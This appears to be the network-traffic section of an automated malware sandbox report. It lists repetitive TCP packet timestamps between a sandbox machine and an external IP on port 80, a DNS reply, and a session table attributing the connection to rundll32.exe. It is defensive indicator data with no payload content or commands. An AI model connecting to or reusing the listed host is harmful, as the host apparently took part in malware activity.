Apr 22, 2022 15:33:01.154818058 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154836893 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.154850006 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.154896021 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.155360937 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.155397892 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.155416012 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.155438900 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.155455112 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.155488968 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.155525923 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.155528069 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.155546904 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.155574083 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.155698061 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.155720949 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.155746937 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.155778885 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.195228100 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195275068 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195293903 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195317984 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195341110 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.195343018 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195360899 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195394993 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.195451021 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.195535898 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195563078 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195579052 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195601940 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195626974 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195643902 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195653915 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.195712090 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.195888042 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195914030 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195930004 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195951939 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195965052 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.195976019 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.195991993 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.196026087 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.196067095 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.196095943 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.196156979 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.236058950 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.236100912 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.236119032 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.236139059 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.236162901 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.236179113 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.236185074 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.236222982 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.236489058 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.236515999 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.236531973 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.236557007 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.236588955 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.236661911 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.236686945 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.236706018 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.236711025 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.236728907 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.236738920 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.236752033 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.236768961 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.236769915 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.236804962 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.236901999 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.236947060 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.236958027 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.236964941 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.237004042 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.237061024 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.237085104 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.237099886 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.237113953 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.237157106 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.237186909 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.237206936 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.237236023 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.237262964 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.277200937 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.277257919 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.277278900 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.277308941 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.277311087 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.277328014 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.277353048 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.277364969 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.277391911 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.277628899 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.277656078 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.277673006 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.277683973 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.277715921 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.277731895 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.277755976 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.277789116 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.277801991 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.278222084 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.278254032 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.278271914 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.278278112 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.278295040 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.278318882 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.278320074 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.278354883 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.278398991 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.278414965 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.278948069 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.278975964 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.278992891 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.279006958 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.279037952 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.279088020 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.279112101 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.279129982 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.279129982 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.279159069 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.279284954 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.279308081 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.279337883 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.279654026 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.318133116 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.318192959 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.318211079 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.318233013 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.318250895 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.318252087 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.318279028 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.318300962 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.319020033 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319046974 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319063902 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319087029 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.319087982 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319104910 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319142103 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.319160938 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319180012 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.319221020 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.319251060 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319268942 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319304943 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.319386005 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319411993 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319428921 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319432974 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.319463968 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.319485903 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319513083 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319525003 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.319529057 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319576025 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.319655895 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319683075 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319699049 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319703102 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.319735050 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.319838047 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319860935 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.319886923 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.319924116 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.359074116 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.359122038 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.359138966 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.359160900 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.359167099 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.359179020 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.359201908 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.359244108 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.360130072 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360168934 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360187054 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360208988 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360209942 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.360232115 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360244989 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.360250950 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360280991 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.360371113 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360399961 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360415936 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360424042 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.360439062 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360452890 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.360461950 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360480070 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360487938 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.360517979 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.360620975 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360646963 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360663891 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360675097 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.360686064 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360709906 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360719919 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.360726118 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360744953 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.360749960 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.360790968 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.400324106 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.400381088 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.400403976 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.400429964 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.400450945 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.400527954 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.400615931 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.400657892 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.400703907 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.400707960 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.400723934 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.400749922 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.400757074 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.400768995 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.400801897 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.400835991 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.401048899 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.401082039 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.401099920 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.401109934 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.401127100 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.401144981 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.401159048 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.401201963 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.401413918 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.401449919 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.401468992 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.401494980 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.401494980 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.401521921 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.401540041 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.401561022 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.401612997 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.401740074 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.401772976 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.401791096 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.401803017 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.401818991 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.401850939 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.401901960 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.441050053 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.441095114 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.441118956 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.441137075 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.441158056 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.441180944 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.441179991 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.441203117 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.441219091 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.441236973 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.441246033 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.441293001 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.441936970 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.441972971 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.442032099 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.442035913 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.442056894 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.442070961 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.442080975 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.442105055 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.442106962 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.442127943 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.442142963 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.442145109 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.442162037 CEST | 80 | 49746 | 146.70.35.138 | 192.168.2.3 |
Apr 22, 2022 15:33:01.442181110 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.442200899 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Apr 22, 2022 15:33:01.442226887 CEST | 49746 | 80 | 192.168.2.3 | 146.70.35.138 |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Apr 22, 2022 15:32:39.516962051 CEST | 8.8.8.8 | 192.168.2.3 | 0x1381 | No error (0) | | | 13.107.43.16 | A (IP address) | IN (0x0001) |

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49746 | 146.70.35.138 | 80 | C:\Windows\SysWOW64\rundll32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Apr 22, 2022 15:32:59.896476030 CEST | 660 | OUT | |
Apr 22, 2022 15:33:00.272408009 CEST | 662 | IN | |